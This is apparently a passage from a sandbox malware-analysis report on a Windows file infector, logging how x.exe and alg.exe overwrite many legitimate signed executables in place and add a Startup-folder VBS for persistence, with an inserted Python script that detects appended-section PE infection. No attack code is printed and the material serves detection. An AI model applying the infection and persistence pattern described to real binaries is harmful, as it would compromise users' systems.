                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
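                  The entries above show x.exe and then alg.exe (itself dropped by x.exe) rewriting legitimate signed third-party and system executables in place rather than dropping new files. The per-offset "File written" records further down in this report (a write at offset 0 to the PE header, then writes at and beyond the original end of the target) are consistent with a file infector that appends its code as a new section and points the entry point at it. The Python below is an added example for this report, not code from Joe Sandbox or from the sample: it builds a small clean PE32 image and the same image after an appended-section infection (both constructed in memory; the section name ".xyz" and the NOP/RET payload are made up), then applies the triage heuristics an analyst would run over copies of the files listed above: entry point inside the last section, a writable and executable last section, and data past the end of the section table.

```python
"""Heuristic check for the appended-section pattern a PE file infector leaves behind.

Added example for this report, not code from Joe Sandbox or from the sample. The two
images it inspects are constructed in memory below; no real binary is read or modified.
"""
import struct
from dataclasses import dataclass

FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
SCN_CODE, SCN_IDATA = 0x00000020, 0x00000040
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"                                          # IMAGE_SECTION_HEADER, 40 bytes
OPT32_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "H" * 2 + "I" * 6  # PE32 optional header, 96 bytes


@dataclass
class Section:
    name: str
    vsize: int
    va: int
    rawsize: int
    rawptr: int
    chars: int


def align(n, a):
    return (n + a - 1) // a * a


def build_pe(sections, entry_rva):
    """Emit a minimal PE32 image: DOS stub, COFF header, optional header, section table, raw data."""
    e_lfanew, opt_size = 0x40, 224
    hdr_size = align(e_lfanew + 4 + 20 + opt_size + 40 * len(sections), FILE_ALIGN)
    rawptr, rva, table, body = hdr_size, SECT_ALIGN, b"", b""
    for name, chars, data in sections:
        rawsize = align(len(data), FILE_ALIGN)
        table += struct.pack(SECTION_FMT, name.encode(), len(data), rva, rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
        rva += align(len(data), SECT_ALIGN)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack(OPT32_FMT,
                      0x10B, 14, 0, 0, 0, 0, entry_rva, SECT_ALIGN, SECT_ALIGN,  # standard fields
                      0x400000, SECT_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0, 0,     # ImageBase .. Win32VersionValue
                      rva, hdr_size, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)                                           # 16 empty data directories
    return (dos + coff + opt + table).ljust(hdr_size, b"\0") + body


def parse(pe):
    """Return (AddressOfEntryPoint, [Section]) from a PE image held in memory."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", pe, opt + 16)[0]                 # same offset in PE32 and PE32+
    sections = []
    for i in range(nsect):
        f = struct.unpack_from(SECTION_FMT, pe, opt + opt_size + 40 * i)
        sections.append(Section(f[0].rstrip(b"\0").decode(), f[1], f[2], f[3], f[4], f[9]))
    return entry, sections


def analyze(pe):
    """Appended-section infector heuristics; returns a list of findings (empty means nothing suspicious)."""
    entry, sections = parse(pe)
    findings = []
    ep = [i for i, s in enumerate(sections) if s.va <= entry < s.va + max(s.vsize, s.rawsize)]
    if not ep:
        findings.append("entry point outside every section")
    elif len(sections) > 1 and ep[0] == len(sections) - 1:
        findings.append(f"entry point in last section {sections[-1].name!r}")
    last = sections[-1]
    if last.chars & SCN_WRITE and last.chars & SCN_EXEC:
        findings.append(f"last section {last.name!r} is writable and executable")
    overlay = len(pe) - max(s.rawptr + s.rawsize for s in sections)
    if overlay > 0:   # informational: Authenticode signatures also live past the last section
        findings.append(f"{overlay} bytes of data after the last section")
    return findings


def build_samples():
    """Constructed clean image and the same image after an appended-section infection (made up)."""
    text = (".text", SCN_CODE | SCN_EXEC | SCN_READ, b"\xc3" * 16)            # 16 x RET
    data = (".data", SCN_IDATA | SCN_READ | SCN_WRITE, b"\0" * 32)
    clean = build_pe([text, data], entry_rva=0x1000)
    stub = (".xyz", SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE, b"\x90" * 64 + b"\xc3")
    infected = build_pe([text, data, stub], entry_rva=0x3000)                 # EP redirected to the new section
    return clean, infected


if __name__ == "__main__":
    for label, image in zip(("clean", "infected"), build_samples()):
        print(f"{label}: {len(image)} bytes ->", analyze(image) or "no findings")
```

                  Against a host, run analyze(open(path, "rb").read()) on a copy of each file listed above. The overlay finding on its own is not evidence of tampering: Authenticode-signed binaries keep their signature blob past the last section, and many installers carry payload there. Confirm with signature verification (Get-AuthenticodeSignature or the catalog) and by hashing against a known-good installation of the same version; these heuristics only tell you which files to look at first.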

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe
                    File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs
                  Source: C:\Users\user\AppData\Local\Temp\x.exe
                    Code function: 1_2_00A9CBD0 StrStrIW, CloseHandle, StrStrIW, CloseServiceHandle, OpenServiceW, StrStrIW, _wcslen, ChangeServiceConfigW, StrStrIW, StrStrIW, CloseServiceHandle, CloseHandle, StartServiceW

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\mshta.exe
                    File written: C:\Users\user\AppData\Local\Temp\x.exe, offset: 0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe
                    File written: C:\Users\user\AppData\Roaming\31d53b0537b9f482.bin, offset: 0
                    File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, offsets in write order: 0, 162304, 735820, 0, 737280, 1285120, 0, 1286144, 1289427, 0, 0, 735744, 31704
                    File written: C:\Users\user\AppData\Local\Temp\autE8B0.tmp, offsets in write order: 0, 196608
                    File written: C:\Users\user\AppData\Local\Temp\avenses, offsets in write order: 0, 196608, 208896
                    File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, offset: 0
                    File written: C:\Windows\System32\alg.exe, offsets in write order: 0, 95744, 669260, 0, 672768, 1220608, 0, 1221632, 1224840, 0, 0, 669184, 53125
                    File written: C:\Users\user\AppData\Local\subpredicate\differences.exe, offset: 0
                    File written: C:\Windows\System32\alg.exe, offset: 0
                    File written: C:\Windows\System32\AppVClient.exe, offsets in write order: 0, 767488, 1341004, 0, 1344512, 1347720
                  Source: C:\Windows\System32\alg.exe
                    File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.bin, offset: 0
                    File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe, offsets in write order: 0, 1792000, 2365516, 0, 0, 2365440, 777420, 0
                    File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, offsets in write order: 0, 1776128, 2349644, 0, 0, 2349568, 677164, 0
                    File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, offsets in write order: 0, 228352, 801868, 0, 0, 801792, 43297, 0
                    File written: C:\Program Files\7-Zip\7z.exe, offsets in write order: 0, 557056, 1130572, 0, 0, 1130496, 382726, 0
                    File written: C:\Program Files\7-Zip\7zFM.exe, offsets in write order: 0, 952832, 1526348, 0, 0, 1526272, 614020, 0
                    File written: C:\Program Files\7-Zip\7zG.exe, offsets in write order: 0, 700416, 1273932, 0, 0, 1273856, 464916, 0
                    File written: C:\Program Files\7-Zip\Uninstall.exe, offsets in write order: 0, 14848, 588364, 0, 0, 588288, 5610, 0
                    File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe, offsets in write order: 0, 5630464, 6203980, 0, 0, 6203904, 3201596, 0
                    File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe, offsets in write order: 0, 27136, 600652, 0, 0, 600576, 8988, 0
                    File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe, offsets in write order: 0, 31744, 605260, 0, 0, 605184, 12684
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
